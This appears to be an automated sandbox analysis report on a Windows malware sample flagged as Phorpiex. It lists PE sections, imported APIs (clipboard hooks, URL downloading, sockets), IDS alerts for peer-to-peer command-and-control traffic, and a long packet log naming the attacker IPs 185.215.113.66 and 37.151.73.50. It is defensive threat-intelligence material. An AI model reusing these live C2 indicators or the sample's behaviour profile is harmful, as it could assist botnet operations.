                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000xe7ca0xe8001aca5c8a58cabff1a9ac7bde70c48075False0.46853111530172414data6.132634994891317IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x100000x393a0x3a00549718be2c57075c01e894ac5660f4c2False0.44396551724137934data5.481279103860119IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0x140000x77000x6400e9d1d3f5f7e251daf64080999c1d6da7False0.121640625data3.791264499968801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              DLLImport
                                                                              WS2_32.dllgethostname, recvfrom, setsockopt, closesocket, htons, shutdown, WSAStartup, connect, WSAWaitForMultipleEvents, listen, WSASocketA, WSACreateEvent, WSAGetOverlappedResult, WSAEventSelect, WSAEnumNetworkEvents, WSAGetLastError, WSASend, WSARecv, WSACloseEvent, accept, getpeername, getsockname, inet_addr, gethostbyname, inet_ntoa, socket, bind, sendto, ioctlsocket, recv, send
                                                                              SHLWAPI.dllStrStrIA, StrCmpNW, StrStrW, PathFileExistsW, StrChrA, PathFindFileNameW, StrCmpNIA, PathMatchSpecW
                                                                              urlmon.dllURLDownloadToFileW
                                                                              WININET.dllHttpOpenRequestA, HttpSendRequestA, InternetConnectA, InternetCloseHandle, DeleteUrlCacheEntry, InternetReadFile, InternetOpenA, InternetCrackUrlA, HttpAddRequestHeadersA, HttpQueryInfoA, InternetOpenUrlA, DeleteUrlCacheEntryW, InternetOpenUrlW, InternetOpenW
                                                                              ntdll.dllstrlen, isdigit, isalpha, memcpy, memset, NtQueryVirtualMemory, RtlUnwind, _chkstk, _aulldiv, wcslen, wcscmp, _allshl, _aullshr, strstr, strcmp, memmove, memcmp, RtlTimeToSecondsSince1980, NtQuerySystemTime, mbstowcs
                                                                              msvcrt.dllsrand, rand, _vscprintf
                                                                              KERNEL32.dllGetQueuedCompletionStatus, PostQueuedCompletionStatus, GetSystemInfo, lstrcmpW, SetEvent, CreateProcessW, GetLocaleInfoA, DeleteCriticalSection, GetCurrentThread, GetThreadPriority, SetThreadPriority, GetCurrentProcess, DuplicateHandle, IsBadReadPtr, InterlockedExchangeAdd, InterlockedIncrement, WaitForSingleObject, InterlockedDecrement, InterlockedExchange, HeapFree, HeapValidate, HeapReAlloc, GetProcessHeaps, HeapCreate, HeapSetInformation, GetCurrentProcessId, HeapAlloc, CreateMutexA, GetLastError, ExitProcess, ExpandEnvironmentStringsW, CreateEventA, CreateThread, GetModuleFileNameW, GetVolumeInformationW, GetDiskFreeSpaceExW, SetFileAttributesW, DeleteFileW, CopyFileW, lstrcmpiW, CreateDirectoryW, FindFirstFileW, CreateIoCompletionPort, MoveFileExW, FindNextFileW, FindClose, RemoveDirectoryW, GetLogicalDrives, GetDriveTypeW, QueryDosDeviceW, lstrcpyW, WriteFile, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, CreateFileW, CreateFileMappingW, MapViewOfFile, GlobalUnlock, GlobalLock, GlobalAlloc, lstrlenA, lstrlenW, lstrcpynW, MultiByteToWideChar, ExitThread, GetTickCount, Sleep, GetModuleHandleW, CloseHandle, UnmapViewOfFile, GetFileSize
                                                                              USER32.dllRegisterClassExW, CreateWindowExW, GetMessageA, TranslateMessage, wsprintfW, DefWindowProcA, ChangeClipboardChain, RegisterRawInputDevices, GetClipboardData, DispatchMessageA, EmptyClipboard, SetClipboardData, CloseClipboard, IsClipboardFormatAvailable, SendMessageA, SetWindowLongW, SetClipboardViewer, GetWindowLongW, wsprintfA, wvsprintfA, OpenClipboard
                                                                              ADVAPI32.dllCryptReleaseContext, RegQueryValueExW, RegOpenKeyExW, RegOpenKeyExA, RegCreateKeyExW, CryptAcquireContextW, CryptGenRandom, RegCloseKey, RegSetValueExW, RegSetValueExA
                                                                              SHELL32.dllShellExecuteW
                                                                              ole32.dllCoInitializeEx, CoUninitialize, CoInitialize, CoCreateInstance
                                                                              OLEAUT32.dllSysFreeString, SysAllocString
                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                              05/08/24-15:22:40.436270UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5310040500192.168.2.8100.82.121.252
                                                                              05/08/24-15:22:45.471815TCP2837677ETPRO TROJAN Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)8049713185.215.113.66192.168.2.8
                                                                              05/08/24-15:22:46.732432TCP2837677ETPRO TROJAN Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)8049715185.215.113.66192.168.2.8
                                                                              05/08/24-15:22:49.024024TCP2837677ETPRO TROJAN Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)8049717185.215.113.66192.168.2.8
                                                                              05/08/24-15:22:48.428846TCP2837677ETPRO TROJAN Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)8049716185.215.113.66192.168.2.8
                                                                              05/08/24-15:22:30.416735UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5310040500192.168.2.8189.222.182.86
                                                                              05/08/24-15:22:35.420978UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5310040500192.168.2.82.133.220.58
                                                                              05/08/24-15:22:25.401623UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5310040500192.168.2.810.102.10.21
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              May 8, 2024 15:22:19.443481922 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:19.784830093 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:19.784917116 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:19.785147905 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:19.962255955 CEST4970940500192.168.2.837.151.73.50
                                                                              May 8, 2024 15:22:20.125612974 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.126646996 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.126723051 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.126725912 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.126769066 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.126774073 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.126806974 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.126821041 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.126826048 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.126857042 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.126866102 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.126892090 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.126908064 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.126931906 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.126935005 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.126945972 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.126949072 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.126966953 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.126991987 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.127024889 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.127063990 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.130441904 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.130460978 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.467386007 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.467408895 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.467422009 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.467436075 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.467442989 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.467451096 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.467464924 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.467483997 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.467489958 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.467495918 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.467499971 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.467511892 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.467519999 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.467526913 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.467546940 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.467567921 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.467633963 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.467680931 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.467804909 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.467818022 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.467837095 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.467849970 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.467856884 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.467864037 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.467866898 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.467878103 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.467890024 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.467894077 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.467909098 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.467921972 CEST8049708185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:20.467921972 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.467941999 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.467962027 CEST4970880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:20.964433908 CEST4970940500192.168.2.837.151.73.50
                                                                              May 8, 2024 15:22:21.138098001 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:21.480763912 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:21.480850935 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:21.481426001 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:21.823926926 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:21.823957920 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:21.824067116 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:21.824081898 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:21.824080944 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:21.824137926 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:21.824137926 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:21.824238062 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:21.824251890 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:21.824265957 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:21.824280977 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:21.824291945 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:21.824291945 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:21.824327946 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:21.824327946 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:21.824366093 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:21.824378967 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:21.824436903 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:21.824474096 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:21.824474096 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.169785023 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.169892073 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.169954062 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.169953108 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.169969082 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.169994116 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.170028925 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.170066118 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170080900 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170131922 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.170131922 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.170605898 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170619965 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170633078 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170659065 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.170695066 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.170789003 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170803070 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170814991 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170828104 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170840979 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170855045 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170865059 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.170865059 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.170877934 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170891047 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170902967 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.170934916 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.170943975 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.170969009 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170983076 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170989990 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.171062946 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.512552977 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.512574911 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.512587070 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.512605906 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.512676954 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.512687922 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.512742996 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.512876034 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.512913942 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.512921095 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.512955904 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513283968 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513298988 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513323069 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513334990 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513386965 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513420105 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513520002 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513535976 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513559103 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513572931 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513617992 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513631105 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513653040 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513658047 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513674021 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513698101 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513726950 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513746977 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513758898 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513761044 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513772964 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513781071 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513789892 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513793945 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513809919 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513822079 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513824940 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513859987 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513922930 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513936996 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513956070 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513969898 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513997078 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514035940 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514043093 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514075994 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514180899 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514215946 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514225960 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514240026 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514257908 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514270067 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514374018 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514388084 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514400959 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514408112 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514415979 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514422894 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514439106 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514452934 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514462948 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514497042 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514569998 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514584064 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514599085 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514607906 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514622927 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514636993 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514720917 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514734030 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514745951 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514756918 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514763117 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514774084 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514787912 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514802933 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.855673075 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.855699062 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.855714083 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.855762005 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.855832100 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.855885983 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.855902910 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.855915070 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.855937004 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.855957985 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.856414080 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.856427908 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.856440067 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.856467962 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.856488943 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.965038061 CEST4970940500192.168.2.837.151.73.50
                                                                              May 8, 2024 15:22:26.980781078 CEST4970940500192.168.2.837.151.73.50
                                                                              May 8, 2024 15:22:29.232702017 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:29.575280905 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:33.659881115 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:33.660027981 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:33.660134077 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:33.660188913 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:33.660203934 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:33.660233021 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:33.660233021 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:33.660259008 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:33.660425901 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:33.660485029 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:33.660640955 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:33.660691977 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:33.660703897 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:33.660706997 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:33.660728931 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:33.660763025 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:33.661111116 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:33.661156893 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:33.661576033 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:33.661668062 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:33.661694050 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:33.661744118 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:34.003422976 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:34.003463984 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:34.003516912 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:34.003596067 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:34.669456005 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:34.996299982 CEST4970940500192.168.2.837.151.73.50
                                                                              May 8, 2024 15:22:35.018372059 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.018501043 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:35.021296024 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:35.386163950 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.386194944 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.386343956 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.386348963 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:35.386382103 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.386398077 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.386421919 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:35.386456966 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:35.386580944 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.386626005 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:35.386668921 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.386683941 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.386698008 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.386710882 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:35.386713028 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.386729002 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.386732101 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:35.386754036 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:35.386775970 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:35.795547962 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.795568943 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.795717001 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:43.432187080 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:43.773061991 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:43.773205042 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:43.773298979 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:43.773305893 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:43.773320913 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:43.773336887 CEST8049712185.215.113.66192.168.2.8
